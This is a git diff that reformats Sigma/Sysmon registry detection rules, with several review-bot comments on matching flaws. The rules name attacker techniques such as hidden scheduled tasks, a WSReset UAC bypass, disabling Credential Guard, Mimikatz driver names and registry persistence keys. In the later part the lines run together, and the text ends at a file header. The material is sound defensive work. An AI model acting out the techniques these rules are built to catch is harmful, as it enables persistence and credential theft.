level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml
index 835a6dc85..deed103a4 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml
@@ -1,14 +1,12 @@
title: Removal Of Index Value to Hide Schedule Task - Registry
id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
related:
- - id: acd74772-5f88-45c7-956b-6a7b36c294d2
- type: similar
- - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
- type: similar
+ - id: acd74772-5f88-45c7-956b-6a7b36c294d2
+ type: similar
+ - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
+ type: similar
status: test
-description: Detects when the "index" value of a scheduled task is removed or deleted
- from the registry. Which effectively hides it from any tooling such as "schtasks
- /query"
+description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
references:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
author: Nasreddine Bencherchali (Nextron Systems)
@@ -26,7 +24,7 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: DeleteKey
+ EventType: DeleteKey
TargetObject|contains|all:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
- Index
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
index 75123504a..a639db9af 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
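Review bot: `TargetObject|contains|all` with the bare token `Index` (and `SD` in the same hunk of registry_delete_schtasks_hide_task_via_sd_value_removal.yml, which has the same shape) matches that token anywhere after `\TaskCache\Tree\`, including inside a task name, because Sigma `contains` is a case-insensitive substring test; deleting any task whose path happens to contain "index" or "sd" would fire this rule. Anchoring the value name instead, e.g. `TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\` plus `TargetObject|endswith: \Index` (and `\SD` in the sibling rule), keeps the intent without the substring noise. Separately, the title and description describe a value being removed while the re-indented selection line is `EventType: DeleteKey`; if Sysmon reports value deletions as `DeleteValue`, the described technique would not be matched, which is worth confirming against the Sysmon event schema before relying on this rule. The `detection:` block begins outside the hunk.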
@@ -1,11 +1,10 @@
title: Removal Of SD Value to Hide Schedule Task - Registry
id: acd74772-5f88-45c7-956b-6a7b36c294d2
related:
- - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
- type: similar
+ - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
+ type: similar
status: test
-description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry
- hive to hide schedule task. This technique is used by Tarrask malware
+description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
references:
- https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
author: Sittikorn S
@@ -23,7 +22,7 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: DeleteKey
+ EventType: DeleteKey
TargetObject|contains|all:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
- SD
diff --git a/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml
index 2086db5cc..83bfc8deb 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml
@@ -26,8 +26,11 @@ detection:
TargetObject|contains: \SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model
selection_hkcu:
TargetObject|contains:
+ # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
- Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
+ # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
- Classes\AppX3bbba44c6cae4d9695755183472171e2\
+ # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model
selection_appx_1:
diff --git a/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml b/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml
index d2151d2bf..17f4825df 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml
@@ -1,19 +1,17 @@
title: OilRig APT Registry Persistence
id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
related:
- - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
- type: similar
- - id: c0580559-a6bd-4ef6-b9b7-83703d98b561
- type: similar
- - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
- type: similar
+ - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
+ type: similar
+ - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
+ type: similar
+ - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation
+ type: similar
status: test
-description: Detects OilRig registry persistence as reported by Nyotron in their March
- 2018 report
+description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
-author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018/03/23
modified: 2023/03/08
tags:
diff --git a/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml b/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml
index 5f0bec36c..81eec761f 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml
@@ -1,9 +1,7 @@
title: UAC Bypass Via Wsreset
id: 6ea3bf32-9680-422d-9f50-e90716b12a66
status: test
-description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated
- with the Windows Store. It will run a binary file contained in a low-privilege
- registry.
+description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
references:
- https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly
- https://lolbas-project.github.io/lolbas/Binaries/Wsreset
diff --git a/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml
index 29b6bddf4..4e250c865 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml
@@ -1,8 +1,7 @@
title: CMSTP Execution Registry Event
id: b6d235fc-1d38-4b12-adbe-325f06728f37
status: stable
-description: Detects various indicators of Microsoft Connection Manager Profile Installer
- execution
+description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
diff --git a/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml b/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml
index d18a287e7..5a8151145 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml
@@ -1,8 +1,7 @@
title: Disable Security Events Logging Adding Reg Key MiniNt
id: 919f2ef0-be2d-4a7a-b635-eb2b41fde044
status: test
-description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot,
- Windows Event Log service will stopped write events.
+description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.
references:
- https://twitter.com/0gtweet/status/1182516740955226112
author: Ilyas Ochkov, oscd.community
@@ -24,9 +23,11 @@ detection:
- 14
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
- EventType: CreateKey
- - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
+ # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one
+ - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
+ EventType: CreateKey # we don't want deletekey
+ # key rename
+ - NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
condition: registry_event and selection
fields:
- EventID
diff --git a/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml b/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml
index d8dcc29b1..9f8496be1 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml
@@ -1,15 +1,10 @@
title: Wdigest CredGuard Registry Modification
id: 1a2d6c47-75b0-45bd-b133-2c0be75349fd
status: test
-description: 'Detects potential malicious modification of the property value of IsCredGuardEnabled
- from
-
- HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred
- Guard on a system.
-
+description: |
+ Detects potential malicious modification of the property value of IsCredGuardEnabled from
+ HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
This is usually used with UseLogonCredential to manipulate the caching credentials.
-
- '
references:
- https://teamhydra.blog/2020/08/25/bypassing-credential-guard/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
diff --git a/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml b/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml
index 2fd6474e2..e449235ba 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml
@@ -1,9 +1,7 @@
title: Esentutl Volume Shadow Copy Service Keys
id: 5aad0995-46ab-41bd-a9ff-724f41114971
status: test
-description: Detects the volume shadow copy service initialization and processing
- via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume
- are captured.
+description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
@@ -25,7 +23,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
TargetObject|contains: System\CurrentControlSet\Services\VSS
- Image|endswith: esentutl.exe
+ Image|endswith: esentutl.exe # limit esentutl as in references, too many FP to filter
filter:
TargetObject|contains: System\CurrentControlSet\Services\VSS\Start
condition: registry_event and (selection and not filter)
diff --git a/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml b/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml
index e4ef98a6a..4a7c1dcb5 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml
@@ -1,8 +1,7 @@
title: HybridConnectionManager Service Installation - Registry
id: ac8866c7-ce44-46fd-8c17-b24acff96ca8
status: test
-description: Detects the installation of the Azure Hybrid Connection Manager service
- to allow remote code execution from Azure function.
+description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
references:
- https://twitter.com/Cyb3rWard0g/status/1381642789369286662
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
@@ -25,7 +24,7 @@ detection:
selection1:
TargetObject|contains: \Services\HybridConnectionManager
selection2:
- EventType: SetValue
+ EventType: SetValue
Details|contains: Microsoft.HybridConnectionManager.Listener.exe
condition: registry_event and (selection1 or selection2)
falsepositives:
diff --git a/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml b/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml
index 568aaf352..2817b0303 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml
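Review bot: `Image|endswith: esentutl.exe` on the changed line of the first hunk has no leading path separator, so it also matches any image whose file name merely ends in that string, unlike the `\name.exe` form the other rules in this commit use for `Image|endswith`. `Image|endswith: \esentutl.exe` keeps the comment's intent ("limit esentutl") while matching the binary name exactly. The enclosing `detection:` block begins outside the hunk.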
+++ b/sigma/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml
@@ -22,11 +22,11 @@ detection:
- 14
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - TargetObject:
- - HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}
- - HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}
- - HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}
- - TargetObject|startswith: HKLM\SYSTEM\Setup\PrintResponsor\
+ - TargetObject:
+ - HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}
+ - HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}
+ - HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}
+ - TargetObject|startswith: HKLM\SYSTEM\Setup\PrintResponsor\
condition: registry_event and selection
falsepositives:
- Unknown
diff --git a/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml b/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml
index a4ef4e8ed..642371623 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml
@@ -1,8 +1,7 @@
title: Potential Qakbot Registry Activity
id: 1c8e96cd-2bed-487d-9de0-b46c90cade56
status: experimental
-description: Detects a registry key used by IceID in a campaign that distributes malicious
- OneNote files
+description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
references:
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
author: Hieu Tran
diff --git a/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml b/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml
index 83abac82d..64d57d183 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml
@@ -1,8 +1,7 @@
title: PrinterNightmare Mimikatz Driver Name
id: ba6b9e43-1d45-4d3c-a504-1043a64c8469
status: test
-description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited
- in CVE-2021-1675 and CVE-2021-34527
+description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
references:
- https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760
- https://www.lexjansen.com/sesug/1993/SESUG93035.pdf
@@ -45,10 +44,8 @@ detection:
- Gentil Kiwi
- mimikatz printer
- Kiwi Legit Printer
- condition: registry_event and (selection or selection_alt or (selection_print
- and selection_kiwi))
+ condition: registry_event and (selection or selection_alt or (selection_print and selection_kiwi))
falsepositives:
- - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser
- printer (unlikely)
+ - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
level: critical
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml b/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
index 99f79cf06..8c35bf5ca 100644
--- a/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
+++ b/sigma/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml
@@ -1,8 +1,7 @@ title: Path To Screensaver Binary Modified id: 67a6c006-3fbe-46a7-9074-2ba3b82c3000 status: test -description: Detects value modification of registry key containing path to binary - used as screensaver. +description: Detects value modification of registry key containing path to binary used as screensaver. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf @@ -25,7 +24,7 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|endswith: \Control Panel\Desktop\SCRNSAVE.EXE + TargetObject|endswith: \Control Panel\Desktop\SCRNSAVE.EXE # HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE filter: Image|endswith: - \rundll32.exe diff --git a/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml b/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml index 1e3f07933..11eb04313 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml @@ -22,10 +22,11 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection1: - EventType: DeleteValue + EventType: DeleteValue TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute selection2: TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default) + # Add the payload in the (Default) condition: registry_event and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml index 449ad061f..65a8c2967 100644 
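Review bot: The new comment `# Add the payload in the (Default)` under selection2 in registry_event_narrator_feedback_persistance.yml is too terse to tell a reader what is being detected or why. The `(Default)` value of a `\Shell\open\command` key holds the command line the shell launches for that verb, so that is where a persistence payload is written; a comment such as `# The (Default) value of Shell\open\command holds the command line launched for the AppX handler; a write here is where the payload lands` would say that. It may also be worth noting that selection2 carries no `EventType` restriction, so with the visible `- 14` event list any create, set or delete event on that value will match — presumably intended, but worth stating in the comment so tuners do not add a filter by accident.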
--- a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml @@ -1,13 +1,9 @@ title: New DLL Added to AppCertDlls Registry Key id: 6aa1d992-5925-4e9f-a49b-845e51d1de01 status: test -description: 'Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - value in the Registry key can be abused to obtain persistence and privilege escalation - - by causing a malicious DLL to be loaded and run in the context of separate processes - on the computer. - - ' +description: | + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation + by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. references: - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html @@ -29,8 +25,10 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls - - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls + # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one + - TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls + # key rename + - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls condition: registry_event and selection fields: - EventID diff --git a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml index e922eba9c..2d4007506 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml 
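Review bot: The re-indented `NewName` value on the new side still reads `HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls` — `CurentControlSet` is missing an `r`, so the rename branch that the new `# key rename` comment documents can never match a Sysmon `NewName` field and the rule silently detects only direct writes to the key. Change it to `- NewName: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls`, matching the `TargetObject` line directly above it. The typo predates this commit, but the commit touches and annotates the line, so this is the place to fix it.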
+++ b/sigma/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml @@ -1,9 +1,7 @@ title: New DLL Added to AppInit_DLLs Registry Key id: 4f84b697-c9ed-4420-8ab5-e09af5b2345d status: test -description: DLLs that are specified in the AppInit_DLLs value in the Registry key - HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll - into every process that loads user32.dll +description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll references: - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html author: Ilyas Ochkov, oscd.community, Tim Shelton @@ -24,12 +22,13 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetObject|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - NewName|endswith: - - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls - - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - TargetObject|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + # Key Rename + - NewName|endswith: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls + - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls filter: Details: (Empty) condition: registry_event and (selection and not filter) diff --git a/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml b/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml index 0c05c3ab9..a494f2a4c 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml 
+++ b/sigma/sysmon/registry/registry_event/registry_event_office_test_regadd.yml @@ -1,8 +1,7 @@ title: Office Application Startup - Office Test id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c status: test -description: Detects the addition of office test registry that allows a user to specify - an arbitrary DLL that will be executed every time an Office application is started +description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started references: - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ author: omkar72 diff --git a/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml b/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml index fcb9b77b4..b44564b7d 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml @@ -1,11 +1,10 @@ title: Windows Registry Trust Record Modification id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: similar status: test -description: Alerts on trust record modification within the registry, indicating usage - of macros +description: Alerts on trust record modification within the registry, indicating usage of macros references: - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/ - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html diff --git a/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml b/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml index db3c33292..126a3afdf 100644 
--- a/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml @@ -24,10 +24,10 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection_create: - EventType: RenameKey + EventType: RenameKey NewName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open selection_set: - EventType: SetValue + EventType: SetValue TargetObject|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\(Default) condition: registry_event and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml b/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml index 041eb97c1..e21c6f19f 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml @@ -1,8 +1,7 @@ title: PortProxy Registry Key id: a54f842a-3713-4b45-8c84-5f136fdebd3c status: test -description: Detects the modification of PortProxy registry key which is used for - port forwarding. For command execution see rule win_netsh_port_fwd.yml. +description: Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml. references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ diff --git a/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml b/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml index d60e77b5f..107299b61 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_runkey_winekey.yml 
@@ -1,8 +1,7 @@ title: WINEKEY Registry Modification id: b98968aa-dbc0-4a9c-ac35-108363cbf8d5 status: test -description: Detects potential malicious modification of run keys by winekey or team9 - backdoor +description: Detects potential malicious modification of run keys by winekey or team9 backdoor references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html author: omkar72 @@ -23,8 +22,7 @@ detection: - 14 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup - Mgr + TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr condition: registry_event and selection fields: - ComputerName diff --git a/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml b/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml index 0e9d5eadc..6a1c19021 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml +++ b/sigma/sysmon/registry/registry_event/registry_event_runonce_persistence.yml @@ -1,8 +1,7 @@ title: Run Once Task Configuration in Registry id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff status: test -description: Rule to detect the configuration of Run Once registry key. Configured - payload can be run by runonce.exe /AlternateShellStartup +description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ 
@@ -28,14 +27,12 @@ detection: TargetObject|endswith: \StubPath filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging - --system-level + Details|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' - '"C:\Program Files\Microsoft\Edge\Application\' - Details|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging - --system-level --msedge --channel=stable + Details|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable condition: registry_event and (selection and not 1 of filter_*) falsepositives: - Legitimate modification of the registry key by legitimate program diff --git a/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml index 3a4c71821..48b159b32 100644 --- a/sigma/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml +++ 